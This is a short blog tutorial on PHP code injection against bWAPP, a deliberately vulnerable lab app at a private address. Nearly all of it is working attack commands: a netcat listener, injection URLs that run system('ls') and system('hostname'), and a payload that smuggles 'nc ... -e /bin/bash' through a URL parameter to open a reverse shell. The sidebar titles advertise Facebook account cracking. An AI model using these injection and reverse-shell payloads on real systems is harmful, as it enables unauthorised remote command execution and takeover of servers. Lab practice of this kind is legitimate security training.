Ethical Hacking Playground

hacking is curiosity

Search for:

Menu

Home
Resume
Videos
Merch
Bug Bounty

PHP Code Injection

Commands

Listen for a connection


nc -lvp 4444

list the files


http://192.168.20.131/bWAPP/phpi.php?message=system('ls')

view the hostname


http://192.168.20.131/bWAPP/phpi.php?message=system('hostname')

Make a connection to the remote host


http://192.168.20.131/bWAPP/phpi.php?message=system('nc -vn 192.168.20.131 4444 -e /bin/bash')

Demonstration

If you have any questions please comment below.

Share this:

Click to share on Facebook (Opens in new window)
Click to share on LinkedIn (Opens in new window)
Click to share on Twitter (Opens in new window)
Click to print (Opens in new window)

Like this:

Like Loading...

YouTube Channel

Login with Patreon

Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy

Top Posts & Pages

Bruteforcing Facebook Passwords
10 Most Used Black Hat Hacking Tools | Kali Linux
Videos
Extract Email, Phone Numbers of Facebook friends with OSIF Tool | Kali Linux
Reverse Engineering .NET Applications With DNSpy
Advanced Bug Bounty Hunting
Social Engineering Toolkit - Credential Harvester Attack (Port-Forwarding)
How to Crack Facebook Accounts With FBKiller
Let's get started
Cross-Site Request Forgery (CSRF)

Community

Recent Posts

M4: Bug Bounty | SSRF December 21, 2020
M2: Advanced XSS Techniques! December 21, 2020
M1: Advanced Recon December 21, 2020
M3: Advanced CSRF Techniques!!! December 21, 2020
Check out my Redubble!!! December 21, 2020

Blog Stats

89,070 hits

Loading Comments...

Write a Comment...

Email (Required)

Name (Required)

Website

%d bloggers like this: